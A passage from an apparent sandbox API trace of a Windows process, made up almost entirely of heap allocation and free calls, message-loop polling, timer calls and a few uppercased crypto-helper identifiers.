(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0186.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0186.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0186.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0186.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0186.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0186.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.104] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0186.104] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0186.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0186.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0186.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0186.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0186.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.105] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0186.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0186.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0186.106] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.106] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0186.106] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0186.106] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0186.106] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0186.106] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0186.106] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0186.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0186.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0186.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0186.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0186.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0186.107] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0186.107] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0186.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0186.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0186.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0186.107] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0186.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0186.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0186.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0186.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0186.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0186.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0186.107] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0186.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4328) returned 0x2f34cd8 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0186.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0186.108] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4328) returned 0x2f39008 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f34cd8 | out: hHeap=0x970000) returned 1 [0186.108] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.108] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0186.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0186.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0186.109] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0186.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0186.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0186.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.109] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0186.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0186.109] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0186.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0186.109] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0186.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0186.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0186.109] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0186.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0186.109] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0186.110] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0186.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0186.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0186.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0186.110] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0186.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0186.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0186.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0186.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0186.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0186.110] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0186.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0186.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0186.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0186.110] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0186.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0186.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0186.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0186.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0186.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0186.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0186.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0186.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.111] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0186.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0186.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0186.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0186.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0186.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0186.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0186.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0186.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0186.111] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0186.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0186.112] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0186.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0186.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0186.112] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0186.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0186.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0186.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0186.112] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0186.112] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0186.112] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0186.112] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0186.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0186.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0186.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0186.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0186.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0186.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0186.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0186.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0186.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0186.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0186.113] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0186.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0186.113] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0186.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0186.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0186.113] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0186.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0186.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0186.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0186.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0186.113] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.113] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0186.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0186.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0186.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0186.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0186.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0186.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4328) returned 0x2f34cd8 [0186.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0186.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0186.114] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4328) returned 0x2f3d338 [0186.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0186.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0186.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f34cd8 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0186.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0186.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4328) returned 0x2f34cd8 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3d338 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0186.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0186.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4328) returned 0x2f3d338 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f34cd8 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0186.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 